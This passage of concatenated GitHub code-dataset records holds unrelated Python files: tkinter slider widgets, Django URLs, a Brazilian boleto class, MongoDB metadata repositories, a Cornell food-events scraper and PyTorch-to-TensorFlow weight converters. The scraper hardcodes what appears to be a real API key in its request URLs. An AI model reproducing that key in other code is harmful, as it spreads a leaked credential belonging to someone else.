x]))","repo_name":"medcelerate/parallel-cluster","sub_path":"ldap_authenticator.py","file_name":"ldap_authenticator.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11493066806","text":"import tkinter, time, math\n\nclass FloatEntry(tkinter.Entry):\n\n def __init__(self, master, textvariable):\n super().__init__(master, textvariable = textvariable, validatecommand = self.on_validate)\n vcmd = (self.register(self.on_validate), '%P')\n self.config(validate = \"key\" ,validatecommand=vcmd)\n \n def validate(self, string):\n try:\n float(string)\n return True\n \n except:\n if string in (\"\", \"-\"):\n return True\n return False\n\n def on_validate(self, P):\n return self.validate(P) \n\n\nclass Variable_Slider_Widget(tkinter.Frame):\n\n SLIDER_DEFAULT_LOW = 0\n SLIDER_DEFAULT_HIGH = 1\n SLIDER_DEFAULT_VALUE = (SLIDER_DEFAULT_LOW + SLIDER_DEFAULT_HIGH) / 2\n\n def __init__(self, master, text, validate_func = None, result_var = None):\n super().__init__(master)\n\n self.number_of_values = 100\n\n self.label = tkinter.Label(self, text = text)\n self.label.grid(column = 0, row = 0)\n\n if result_var is None:\n self.result_var = tkinter.DoubleVar(self, value = self.SLIDER_DEFAULT_VALUE)\n self.result_var.trace_add(\"write\", validate_func)\n\n else:\n self.result_var = result_var\n \n #resolution = self.number_of_values // (self.SLIDER_DEFAULT_HIGH - self.SLIDER_DEFAULT_LOW)\n resolution = (self.SLIDER_DEFAULT_HIGH - self.SLIDER_DEFAULT_LOW) / self.number_of_values\n self.slider = 
tkinter.Scale(self, variable = self.result_var, from_ = self.SLIDER_DEFAULT_LOW, \n to = self.SLIDER_DEFAULT_HIGH, orient = tkinter.HORIZONTAL,\n resolution = resolution)\n\n self.slider_low_var = tkinter.DoubleVar(self, value=self.SLIDER_DEFAULT_LOW)\n self.slider_low_var.trace_add(\"write\", self.on_update_low_var)\n\n self.slider_high_var = tkinter.DoubleVar(self, value=self.SLIDER_DEFAULT_HIGH)\n self.slider_high_var.trace_add(\"write\", self.on_update_high_var)\n\n self.low_entry = FloatEntry(self, textvariable = self.slider_low_var)\n self.high_entry = FloatEntry(self, textvariable = self.slider_high_var)\n\n self.low_entry.grid(column = 1, row = 0)\n self.slider.grid(column = 2, row = 0)\n self.high_entry.grid(column = 3, row = 0)\n\n def on_update_low_var(self, var, indx, mode):\n self.slider.config(from_=self.slider_low_var.get())\n\n def on_update_high_var(self, var, indx, mode):\n self.slider.config(to_=self.slider_high_var.get())\n\n def adjust_scale_resolution(self):\n resolution = (self.slider_high_var.get() - self.slider_low_var.get()) / self.number_of_values\n\n self.slider.configure(resolution = math.ceil(resolution))\n\n def set_limits(self, low_value, high_value):\n self.slider_low_var.set(low_value)\n self.slider_high_var.set(high_value)\n\n self.adjust_scale_resolution()\n\n def set_value(self, value):\n self.result_var.set(value)\n\n def set_number_of_values(self, value):\n self.number_of_values = value\n\n self.adjust_scale_resolution()\n\n def get_value(self):\n return float(self.result_var.get())\n\n\nclass Time_Slider_Widget(tkinter.Frame):\n\n T_VAR_SPEED_LOW = 0\n T_VAR_SPEED_HIGH = 100\n\n GRAPH_REFRESH_DEAY_LOW = 10\n GRAPH_REFRESH_DEAY_HIGH = 1000\n\n def __init__(self, master, root):\n super().__init__(master)\n\n self.root = root\n\n self.t_var_speed = 1\n self.graph_refresh_delay = 500\n self.time_at_last_refresh = time.time()\n\n self.frame1 = tkinter.Frame(self)\n self.frame1.grid(column = 0, row = 0)\n\n self.label = tkinter.Label(self.frame1, text = \"t: \")\n self.label.grid(column = 0, row = 0)\n\n self.t_var = tkinter.DoubleVar()\n self.t_var_entry = FloatEntry(self.frame1, textvariable = self.t_var)\n self.t_var_entry.grid(column = 1, row = 0)\n\n self.t_var_reset = tkinter.Button(self.frame1, text = \"Reset\", command = self.on_t_var_reset_call)\n self.t_var_reset.grid(column = 2, row = 0)\n\n self.t_var_speed_slider_widget = Variable_Slider_Widget(self, \n \"Time flow rate(/s): \", validate_func = self.on_t_var_speed_change)\n self.t_var_speed_slider_widget.set_limits(self.T_VAR_SPEED_LOW, self.T_VAR_SPEED_HIGH)\n self.t_var_speed_slider_widget.set_value(self.t_var_speed)\n self.t_var_speed_slider_widget.grid(column = 0, row = 1)\n\n self.graph_refresh_delay_slider_widget = Variable_Slider_Widget(self, \n \"Graph refresh rate(ms): \", validate_func = self.on_graph_refresh_delay_change)\n self.graph_refresh_delay_slider_widget.set_limits(self.GRAPH_REFRESH_DEAY_LOW, \n self.GRAPH_REFRESH_DEAY_HIGH)\n self.graph_refresh_delay_slider_widget.set_value(self.graph_refresh_delay)\n self.graph_refresh_delay_slider_widget.grid(column = 0, row = 2)\n\n self.after(int(self.graph_refresh_delay), self.refresh_graph)\n\n def on_t_var_reset_call(self):\n self.t_var.set(0)\n\n def refresh_graph(self):\n self.after(int(self.graph_refresh_delay), self.refresh_graph)\n\n if not self.master.master.enabled:\n return\n\n old_t_var_value = self.t_var.get()\n new_t_value = old_t_var_value + self.t_var_speed * (time.time() - self.time_at_last_refresh)\n 
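Both widget classes above keep a tkinter Scale's bounds in sync with entry fields through variable traces. A stripped-down, standalone sketch of that trace pattern (the layout and names are mine; unlike the FloatEntry class above, this does no input validation, so typing a non-number into an entry raises a TclError inside the trace):

import tkinter

root = tkinter.Tk()

low = tkinter.DoubleVar(root, value=0.0)
high = tkinter.DoubleVar(root, value=1.0)
scale = tkinter.Scale(root, from_=low.get(), to=high.get(),
                      orient=tkinter.HORIZONTAL, resolution=0.01)
scale.pack()

def sync_bounds(*_):
    # re-read both bounds whenever either entry-backed variable changes
    scale.config(from_=low.get(), to=high.get())

low.trace_add("write", sync_bounds)
high.trace_add("write", sync_bounds)

tkinter.Entry(root, textvariable=low).pack()
tkinter.Entry(root, textvariable=high).pack()

root.mainloop()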
self.t_var.set(new_t_value)\n\n self.time_at_last_refresh = time.time()\n\n if \"t\" in self.root.input_frame.equations_input_frame.constants_values:\n self.master.master.constants_values[\"t\"] = new_t_value\n\n self.master.master.plot_on_graph()\n\n def on_t_var_speed_change(self, var, indx, mode):\n self.t_var_speed = self.t_var_speed_slider_widget.get_value()\n\n def on_graph_refresh_delay_change(self, var, indx, mode):\n self.graph_refresh_delay = self.graph_refresh_delay_slider_widget.get_value()\n\n def get_value(self):\n return self.t_var.get()\n\n def reset_t_value(self):\n self.t_var.set(0)\n ","repo_name":"monopolize-all/Wave-Sim","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"8821565874","text":"from django.urls import path, include\nfrom . import views\n\napp_name = 'users'\nurlpatterns = [\n # Default url for auth\n path('', include('django.contrib.auth.urls')),\n # Page for registrations\n path('register/', views.register, name='register'),\n path('registered/', views.registered, name='registered')\n]\n","repo_name":"Papsanly/LearningLog","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16593357790","text":"# -*- coding: utf-8 -*-\nfrom ..data import BoletoData, CustomProperty\n\n\nclass BoletoBanese(BoletoData):\n agencia_cedente = CustomProperty('agencia_cedente',2)\n conta_cedente = CustomProperty('conta_cedente', 9)\n nosso_numero = CustomProperty('nosso_numero', 9)\n\n def __init__(self):\n BoletoData.__init__(self)\n self.codigo_banco = \"047\"\n self.logo_image = \"logo_banese.jpg\"\n\n def _dv_nosso_numero(self):\n return str(self.modulo11(self.nosso_numero, 9, 0))\n\n @property\n def campo_livre(self):\n content = '%02d%09d%09d%03d' % (int(self.agencia_cedente),\n int(self.conta_cedente),\n int(self.nosso_numero),\n int(self.codigo_banco))\n return str('%s%s' % (content, self._dv_campo_livre(content)))\n\n\n def _dv_campo_livre(self, campo_livre):\n dv = self.modulo10(campo_livre)\n while True:\n restoMod11 = self.modulo11(campo_livre + str(dv), 7, 1)\n if restoMod11 != 1:\n break\n dv += 1\n dv %= 10\n\n return str(dv) + str(11 - restoMod11)\n","repo_name":"thallys-moura/pyboleto","sub_path":"pyboleto/bank/banese.py","file_name":"banese.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"37824691197","text":"import abc\nfrom typing import Optional\n\nfrom pymongo import MongoClient, ASCENDING\n\nfrom ted_sws import config\nfrom ted_sws.core.model.metadata import Metadata, NormalisedMetadata, TEDMetadata, XMLMetadata\nfrom ted_sws.data_manager.adapters.repository_abc import MetadataRepositoryABC\n\nMONGODB_COLLECTION_ID = \"_id\"\nAGGREGATE_REFERENCE_ID = \"ted_id\"\nMETADATA_TYPE_ID = \"metadata_type\"\n\n\nclass BaseMetadataRepository(MetadataRepositoryABC, abc.ABC):\n \"\"\"\n This repository is intended for storing Metadata objects.\n \"\"\"\n _collection_name: str = \"notice_metadata\"\n _metadata_type: str = \"unknown\"\n\n def __init__(self, mongodb_client: MongoClient, database_name: str = None):\n database_name = database_name if database_name else config.MONGO_DB_AGGREGATES_DATABASE_NAME\n self._database_name = database_name\n self.mongodb_client = mongodb_client\n db = 
mongodb_client[self._database_name]\n self.collection = db[self._collection_name]\n self.collection.create_index([(AGGREGATE_REFERENCE_ID, ASCENDING)])\n self.collection.create_index([(METADATA_TYPE_ID, ASCENDING)])\n\n def _update_metadata(self, reference: str, metadata: Metadata, upsert: bool = False):\n \"\"\"\n\n :param reference:\n :param metadata:\n :param upsert:\n :return:\n \"\"\"\n if metadata is not None:\n metadata_dict = metadata.model_dump()\n metadata_dict[AGGREGATE_REFERENCE_ID] = reference\n metadata_dict[METADATA_TYPE_ID] = self._metadata_type\n reference = self._build_reference(base_reference=reference)\n metadata_dict[MONGODB_COLLECTION_ID] = reference\n self.collection.update_one({MONGODB_COLLECTION_ID: reference}, {\"$set\": metadata_dict}, upsert=upsert)\n\n def _get_metadata_dict(self, reference: str) -> Optional[dict]:\n \"\"\"\n\n :param reference:\n :return:\n \"\"\"\n reference = self._build_reference(base_reference=reference)\n result_dict = self.collection.find_one({MONGODB_COLLECTION_ID: reference})\n if result_dict:\n del result_dict[MONGODB_COLLECTION_ID]\n del result_dict[AGGREGATE_REFERENCE_ID]\n del result_dict[METADATA_TYPE_ID]\n return result_dict\n\n def _build_reference(self, base_reference: str) -> str:\n \"\"\"\n\n :param base_reference:\n :return:\n \"\"\"\n return f\"{base_reference}_{self._metadata_type}\"\n\n\n def remove(self, reference: str):\n \"\"\"\n This method remove a metadata based on an identification reference.\n :param reference:\n :return:\n \"\"\"\n reference = self._build_reference(reference)\n self.collection.delete_one({MONGODB_COLLECTION_ID: reference})\n\n\nclass NormalisedMetadataRepository(BaseMetadataRepository):\n _metadata_type: str = \"normalised\"\n\n def add(self, reference: str, metadata: NormalisedMetadata):\n \"\"\"\n This method allows you to add normalised metadata objects to the repository.\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n self._update_metadata(reference=reference, metadata=metadata, upsert=True)\n\n def update(self, reference: str, metadata: NormalisedMetadata):\n \"\"\"\n This method allows you to update normalised metadata objects to the repository\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n\n self._update_metadata(reference=reference, metadata=metadata)\n\n def get(self, reference: str) -> Optional[NormalisedMetadata]:\n \"\"\"\n This method allows a normalised metadata to be obtained based on an identification reference.\n :param reference:\n :return: Metadata\n \"\"\"\n\n result_dict = self._get_metadata_dict(reference=reference)\n if result_dict is not None:\n return NormalisedMetadata(**result_dict)\n return None\n\n\nclass TEDMetadataRepository(BaseMetadataRepository):\n _metadata_type: str = \"ted\"\n\n def add(self, reference: str, metadata: TEDMetadata):\n \"\"\"\n This method allows you to add ted metadata objects to the repository.\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n self._update_metadata(reference=reference, metadata=metadata, upsert=True)\n\n def update(self, reference: str, metadata: TEDMetadata):\n \"\"\"\n This method allows you to update ted metadata objects to the repository\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n self._update_metadata(reference=reference, metadata=metadata)\n\n def get(self, reference: str) -> Optional[TEDMetadata]:\n \"\"\"\n This method allows a ted metadata to be obtained based on an identification reference.\n :param reference:\n :return: Metadata\n \"\"\"\n\n result_dict = 
self._get_metadata_dict(reference=reference)\n if result_dict is not None:\n return TEDMetadata(**result_dict)\n return None\n\n\nclass XMLMetadataRepository(BaseMetadataRepository):\n _metadata_type: str = \"xml\"\n\n def add(self, reference: str, metadata: XMLMetadata):\n \"\"\"\n This method allows you to add xml metadata objects to the repository.\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n self._update_metadata(reference=reference, metadata=metadata, upsert=True)\n\n def update(self, reference: str, metadata: XMLMetadata):\n \"\"\"\n This method allows you to update xml metadata objects to the repository\n :param reference:\n :param metadata:\n :return:\n \"\"\"\n\n self._update_metadata(reference=reference, metadata=metadata)\n\n def get(self, reference: str) -> Optional[XMLMetadata]:\n \"\"\"\n This method allows a xml metadata to be obtained based on an identification reference.\n :param reference:\n :return: Metadata\n \"\"\"\n\n result_dict = self._get_metadata_dict(reference=reference)\n if result_dict is not None:\n return XMLMetadata(**result_dict)\n return None\n","repo_name":"OP-TED/ted-rdf-conversion-pipeline","sub_path":"ted_sws/data_manager/adapters/metadata_repository.py","file_name":"metadata_repository.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"8007644444","text":"# -*- coding: utf-8 -*-\n# <nbformat>3.0</nbformat>\n\n# <codecell>\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\nimport time\nimport datetime\nimport requests\nfrom xml.dom import *\nimport xml.etree.cElementTree\nimport unicodedata\nimport numpy\nimport os\nfrom dbwriteevents import eventscornell\nimport re\nfrom collections import Counter\n\nimport xmllib\n\n# <codecell>\n\n\n\n#generates a traversibe DOM tree from unicode text of an XML document, must normalize utf-8 into ascii\n#\ndef genTree(utf8Txt):\n src = unicodedata.normalize('NFKD', utf8Txt).encode('ascii','ignore')\n tree = xml.etree.cElementTree.fromstring(src)\n return tree\n\n#separates the events from the localist XML, returning a list of event subtrees\n#\ndef getEvents(tree):\n events = tree.findall('event')\n return events\n\n#gets text, which in this program is XML, from a web page\n#\ndef getTextFromURL(url):\n somePage = requests.get(url)\n return somePage.text\n somePage.close()\n\n#savesPageTxt to a file for later access\n#\ndef savePageTxt(utfTxt,fn):\n \n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H.%M.%S')\n \n fn = open(fn+st,\"w\")\n\n try:\n fn.write(utfTxt.encode('utf8'))\n finally:\n fn.close\n \n#locates the 'meta' tag of the returned XML to determine the total number of pages an API call returned\n#\ndef determineNumPages(tree):\n return int(tree.find('meta').find('num_pages').text)\n\n#gets thh Nth page of an API querry\n#\ndef getNthPage(startURL,pageNum):\n return getTextFromURL(startURL+\"&page=\"+str(pageNum))\n\n#gets a week of events from Cornell's localist API which returns XML\n# \ndef getWeekOfEvents():\n eventsURL = \"http://events.cornell.edu/api/school/10/events?api_key=KLhy2GtuSAGirYGY&days=7&pp=50\"\n firstPageTxt = getTextFromURL(eventsURL)\n firstTree = genTree(firstPageTxt)\n allEvents = []\n \n numPages = determineNumPages(firstTree)\n \n curPageNum = 1\n while curPageNum <= numPages:\n curTree = genTree(getNthPage(eventsURL,curPageNum))\n allEvents += getEvents(curTree)\n 
numPages=determineNumPages(curTree)\n curPageNum+=1\n time.sleep(1)\n \n return allEvents\n\n#gets years worth of food events, was originally used to train a bayesian classifier which failed. Therefore, this function\n#isn't really used...but yet I left it in here...maybe it will one day be useful.\n#\ndef getLotsOfFoodEvents():\n foodURL = \"http://events.cornell.edu/api/school/10/events?api_key=KLhy2GtuSAGirYGY&days=7&pp=50&start=2010-01-01&end=2013-11-20&type=4259\"\n \n firstPageTxt = getTextFromURL(foodURL)\n firstTree = genTree(firstPageTxt)\n allEvents = []\n \n numPages = determineNumPages(firstTree)\n \n foodEvents=[]\n \n curPageNum = 1\n while curPageNum <= numPages:\n foodTxt = getNthPage(foodURL,curPageNum)\n savePageTxt(foodTxt,\"FoodTraining\"+str(curPageNum))\n curTree = genTree(foodTxt)\n foodEvents += getEvents(curTree)\n numPages=determineNumPages(curTree)\n curPageNum+=1\n time.sleep(1)\n \n return foodEvents\n\n#Gets a week of food events from cornell's API and returns a list of XML trees that represent each event\n#\ndef getWeekOfFoodEvents():\n foodURL = \"http://events.cornell.edu/api/school/10/events?api_key=KLhy2GtuSAGirYGY&days=7&pp=50&type=4259\"\n \n firstPageTxt = getTextFromURL(foodURL)\n firstTree = genTree(firstPageTxt)\n allEvents = []\n \n numPages = determineNumPages(firstTree)\n \n foodEvents=[]\n \n curPageNum = 1\n while curPageNum <= numPages:\n foodTxt = getNthPage(foodURL,curPageNum)\n curTree = genTree(foodTxt)\n foodEvents += getEvents(curTree)\n numPages=determineNumPages(curTree)\n curPageNum+=1\n time.sleep(1)\n \n return foodEvents\n\n# <codecell>\n\n#gets the relevant info from a single event, and returns it as a dictionary\n#\ndef getRelevantInfo(foodEventInformation):\n info = foodEventInformation\n \n #this is a list of the desired information that we want, these correspond to the columns of a mySQL database\n desired = ['title','start','description','end','free','ticket_price','location','room_number','latitude','longitude']\n# desired = ['title','start','end','free','ticket_price','location','room_number']\n \n \n rel = dict()\n \n #pulls the relevant information from a verbose dictionary of foodEventInformation\n for key in desired:\n try:\n val = info[key]\n rel[key] = val\n except KeyError:\n rel[key] = \"\"\n# print 'rel',rel['room_number'] \n# print rel \n return rel\n \n#takes in a list of event trees, iterates over that list, and returns list of dictionaries using getRelevantInfo.\n#the dictionaries contain the event information that we found worthwhile for a datebase of food events.\n#\ndef getFoodInfoForDB(foodEvents):\n fes = foodEvents\n fesInfo = []\n \n for fe in fes:\n info = dict()\n\n for i in fe.iter():\n key = str(i.tag)\n value = str(i.text)\n info[key] = value\n \n fesInfo.append(info)\n \n reducedInfos = []\n \n for event in fesInfo:\n r = getRelevantInfo(event)\n reducedInfos.append(r)\n\n\n#scrape data parsing and creating table elements\n dname=r['start']\n dname=dname.split(\"T\")\n date=dname[0].split(\"-\")\n s=date[0]+'/'+date[1]+'/'+date[2]\n sec=time.mktime(datetime.datetime.strptime(s,'%Y/%m/%d').timetuple())\n\n stime=r['start']\n etime=r['end']\n stime=stime.split(\"T\")\n stime=stime[1].split(\"-\")\n stime=stime[0].split(\":\")\n\n etime=etime.split(\"T\")\n etime=etime[1].split(\"-\")\n etime=etime[0].split(\":\")\n start=int(stime[0])\n end=int(etime[0])\n \n if start > 11:\n if start !=12:start=start-12\n setime=str(start)+\":\"+stime[1]+'pm-'\n else:\n setime=str(start)+\":\"+stime[1]+'am-'\n if 
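getFoodInfoForDB below reconstructs hours through chained split() calls on strings like "2013-11-20T14:00:00-05:00"; a strptime-based sketch of the same parse (the format string is an assumption inferred from that shape):

from datetime import datetime

def parse_event_time(value):
    # keep "YYYY-MM-DDTHH:MM:SS" and drop the trailing UTC offset,
    # which older strptime %z handling could not read
    return datetime.strptime(value[:19], "%Y-%m-%dT%H:%M:%S")

start = parse_event_time("2013-11-20T14:00:00-05:00")
print(start.strftime("%I:%M%p").lower())  # 02:00pm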
end > 11:\n if end !=12:end=end-12\n setime=setime+str(end)+\":\"+etime[1]+'pm'\n else:\n setime=setime+str(end)+\":\"+etime[1]+'am' \n \n \n s1=int(stime[0])\n if s1 < 10.5:\n meal1='Breakfast'\n elif (s1 > 10.5) and (s1 < 16):\n meal1='Lunch'\n# print 'meal1',stime[0]\n else:\n meal1='Dinner'\n\n\n e1=int(etime[0])\n if e1 < 10.5:\n meal2='Breakfast'\n elif (e1 > 10.5) and (e1 < 16):\n meal2='Lunch'\n# print 'meal2',stime[0]\n else:\n meal2='Dinner'\n \n\n# print'mealq',meal1,meal2\n if meal1==meal2:\n eventscornell(r['location'],r['room_number'],sec,setime,meal1,r['title'],r['free'],r['description'])\n else:\n eventscornell(r['location'],r['room_number'],sec,setime,meal1,r['title'],r['free'],r['description'])\n eventscornell(r['location'],r['room_number'],sec,setime,meal2,r['title'],r['free'],r['description'])\n \n\n return reducedInfos\n\n# <codecell>\n\n#RAMIN THIS IS THE IMPORTANT DATA\n#\n#'infos', here below, is a list of python dictionaries that contains relevant event information.\n#\n# use the function call : >>> getFoodInfoForDB(getWeekOfFoodEvents()) \n# this call will get the information you require.\n# MAKE SURE YOU HAVE ALL THE FUNCTIONS FROM THE TOP OF THIS SCRIPT!! (AND THE IMPORT STATEMENTS)\n#\ninfos = getFoodInfoForDB(getWeekOfFoodEvents())\n#print infos\n# <codecell>\n\n\n# <codecell>\n\n\n","repo_name":"zporges/cornellfood","sub_path":"pythonscripts/cornellevents.py","file_name":"cornellevents.py","file_ext":"py","file_size_in_byte":7637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32527736877","text":"import os\r\nimport shutil\r\nimport subprocess\r\nimport sys\r\nfrom optparse import OptionParser\r\n\r\n\r\ndef make_zips(api_dir, dist_dir):\r\n parser = OptionParser(description='Indigo Python libraries build script')\r\n parser.add_option('--suffix', '-s', help='archive suffix', default=\"\")\r\n\r\n (args, left_args) = parser.parse_args()\r\n\r\n # Find indigo version\r\n from get_indigo_version import getIndigoVersion\r\n version = getIndigoVersion()\r\n\r\n if not os.path.exists(dist_dir):\r\n os.mkdir(dist_dir)\r\n\r\n archive_name = \"./indigo-python-%s-%s\" % (version, args.suffix)\r\n\r\n dest = os.path.join(dist_dir, archive_name)\r\n if os.path.exists(dest):\r\n shutil.rmtree(dest)\r\n os.mkdir(dest)\r\n os.mkdir(os.path.join(dest, 'indigo'))\r\n shutil.copy(os.path.join(api_dir, \"python\", 'indigo.py'), os.path.join(dest, 'indigo', '__init__.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"renderer\", \"python\", \"indigo_renderer.py\"), dest)\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"renderer\", \"python\", \"indigo_renderer.py\"), os.path.join(dest, 'indigo', 'renderer.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"inchi\", \"python\", \"indigo_inchi.py\"), dest)\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"inchi\", \"python\", \"indigo_inchi.py\"), os.path.join(dest, 'indigo', 'inchi.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"bingo\", \"python\", \"bingo.py\"), dest)\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"bingo\", \"python\", \"bingo.py\"), os.path.join(dest, 'indigo', 'bingo.py'))\r\n shutil.copytree(os.path.join(api_dir, \"libs\", \"shared\"), os.path.join(dest, \"lib\"), ignore=shutil.ignore_patterns(\"*.lib\"))\r\n\r\n shutil.copy(os.path.join(api_dir, \"LICENSE\"), dest)\r\n os.chdir(dist_dir)\r\n if os.path.exists(archive_name + \".zip\"):\r\n os.remove(archive_name + \".zip\")\r\n 
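make_zips above pairs shutil.make_archive with an os.chdir into dist_dir; the call's semantics in isolation (paths here are hypothetical):

import shutil

# base_name is the output path without extension; root_dir is where the
# archiver chdirs; base_dir is the directory recorded inside the zip.
created = shutil.make_archive(
    base_name="dist/indigo-python-1.0",     # -> dist/indigo-python-1.0.zip
    format="zip",
    root_dir="dist",
    base_dir="indigo-python-1.0",
)
print(created)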
shutil.make_archive(archive_name, 'zip', os.path.dirname(archive_name), archive_name)\r\n shutil.rmtree(archive_name)\r\n full_archive_name = os.path.normpath(os.path.join(dist_dir, archive_name))\r\n print('Archive {}.zip created'.format(full_archive_name))\r\n\r\n\r\ndef make_wheels(api_dir, dest):\r\n if os.path.exists(dest):\r\n shutil.rmtree(dest)\r\n os.makedirs(dest)\r\n os.makedirs(os.path.join(dest, 'indigo'))\r\n\r\n shutil.copy(os.path.join(api_dir, \"LICENSE\"), dest)\r\n shutil.copy(os.path.join(api_dir, \"python\", \"indigo.py\"), os.path.join(dest, 'indigo', '__init__.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"renderer\", \"python\", \"indigo_renderer.py\"), os.path.join(dest, 'indigo', 'renderer.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"inchi\", \"python\", \"indigo_inchi.py\"), os.path.join(dest, 'indigo', 'inchi.py'))\r\n shutil.copy(os.path.join(api_dir, \"plugins\", \"bingo\", \"python\", \"bingo.py\"), os.path.join(dest, 'indigo', 'bingo.py'))\r\n shutil.copy(os.path.join(api_dir, \"python\", \"setup.py\"), dest)\r\n shutil.copytree(os.path.join(api_dir, \"libs\", \"shared\"), os.path.join(dest, 'indigo', \"lib\"), ignore=shutil.ignore_patterns(\"*.lib\"))\r\n cur_dir = os.path.abspath(os.curdir)\r\n os.chdir(dest)\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=win32'])\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=win_amd64'])\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=manylinux1_x86_64'])\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=manylinux1_i686'])\r\n subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=macosx_10_7_intel'])\r\n os.chdir(cur_dir)\r\n\r\n\r\nif __name__ == '__main__':\r\n api_dir = os.path.abspath(os.path.dirname(__file__))\r\n root = os.path.normpath(os.path.join(api_dir, \"..\"))\r\n dist_dir = os.path.join(root, \"dist\")\r\n make_zips(api_dir, dist_dir)\r\n if sys.argv[1] == '-s' and sys.argv[2] == '-universal':\r\n make_wheels(api_dir, os.path.join(dist_dir, 'epam.indigo'))\r\n","repo_name":"AlexanderSavelyev/indigo-test","sub_path":"api/make-python-wrappers.py","file_name":"make-python-wrappers.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13216746117","text":"import logging\nfrom typing import Any, List, NamedTuple, Tuple\n\nimport numpy as np\nimport tensorflow as tf\nimport torch\n\nfrom model import base_model, dla\n\n\nclass WeightHandlerReturn(NamedTuple):\n \"\"\"\n Return data class for WeightHandler.\n processed - True if the weight pair was successfully handled\n matched_source - True if the source weight was processed\n matched_target - True if the target weight was processed\n \"\"\"\n processed: bool\n matched_source: bool\n matched_target: bool\n\n\nclass WeightHandler:\n \"\"\"\n Generic class that deals with processing of a specific pair of weights and chains the operations.\n For subclassing, _process_weights method must be implemented.\n \"\"\"\n\n def __init__(self, logger: logging.Logger = None):\n self.next_handler = None\n self.logger = logger\n\n def then(self, next_handler):\n \"\"\"next_handler: WeightHandler - the next operation to be called if the current handler can not resolve the\n matching\"\"\"\n self.next_handler = next_handler\n return next_handler\n\n def set_chain_logger(self, logger: 
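A toy subclass showing the chain-of-responsibility contract WeightHandler defines: _process_weights either claims the pair or lets convert_weight fall through to the next link. SkipNoneHandler is hypothetical, for illustration only:

class SkipNoneHandler(WeightHandler):
    def _process_weights(self, source_weight, target_weight):
        if source_weight is None:
            # consume the source entry, leave the target for the next pair
            return WeightHandlerReturn(processed=True, matched_source=True,
                                       matched_target=False)
        return WeightHandlerReturn(processed=False, matched_source=False,
                                   matched_target=False)

head = SkipNoneHandler()
head.then(SkipNoneHandler())   # then() returns its argument, so calls chain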
logging.Logger):\n \"\"\"logger: logging.Logger - the logger to be set on all the chained operations\"\"\"\n self.logger = logger\n if self.next_handler is not None:\n self.next_handler.set_chain_logger(logger)\n\n def convert_weight(self, source_weight, target_weight) -> WeightHandlerReturn:\n \"\"\"\n Tries to assign the source_weight to target_weight (i.e. target_weight = source_weight).\n If the assignment is not possible, the next handler in chain is called and the result is returned.\n\n Args:\n source_weight: Any\n target_weight: Any\n Returns:\n WeightHandlerReturn\n \"\"\"\n\n result = self._process_weights(source_weight, target_weight)\n if not result.processed and self.next_handler is not None:\n return self.next_handler.convert_weight(source_weight, target_weight)\n return result\n\n def __call__(self, source_weight, target_weight):\n return self.convert_weight(source_weight, target_weight)\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n \"\"\"Should provide the actual processing logic for the given weight pair\"\"\"\n raise NotImplementedError\n\n\nclass PytorchToTensorflowHandlers:\n @staticmethod\n def _preprocess_tensorflow(tensorflow_weight):\n return tensorflow_weight, tensorflow_weight.name, tuple(tensorflow_weight.shape)\n\n @staticmethod\n def _preprocess_pytorch(pytorch_weight):\n return pytorch_weight[1], pytorch_weight[0], tuple(pytorch_weight[1].shape)\n\n class SameShapeHandler(WeightHandler):\n \"\"\"Assigns source_weight to target_weight if the weights have same shape.\"\"\"\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n weight_tf, name_tf, shape_tf = PytorchToTensorflowHandlers._preprocess_tensorflow(target_weight)\n weight_py, name_py, shape_py = PytorchToTensorflowHandlers._preprocess_pytorch(source_weight)\n\n if shape_tf == shape_py:\n weight_tf.assign(weight_py.numpy())\n if self.logger:\n self.logger.info(f'{name_tf} was assigned successfully from {name_py}')\n return WeightHandlerReturn(processed=True, matched_source=True, matched_target=True)\n\n return WeightHandlerReturn(processed=False, matched_source=False, matched_target=False)\n\n class ConvolutionHandler(WeightHandler):\n \"\"\"Assigns source_weight to target_weight if the weights are 2D convolution weights.\"\"\"\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n weight_tf, name_tf, shape_tf = PytorchToTensorflowHandlers._preprocess_tensorflow(target_weight)\n weight_py, name_py, shape_py = PytorchToTensorflowHandlers._preprocess_pytorch(source_weight)\n\n if len(shape_tf) == len(shape_py) == 4 and 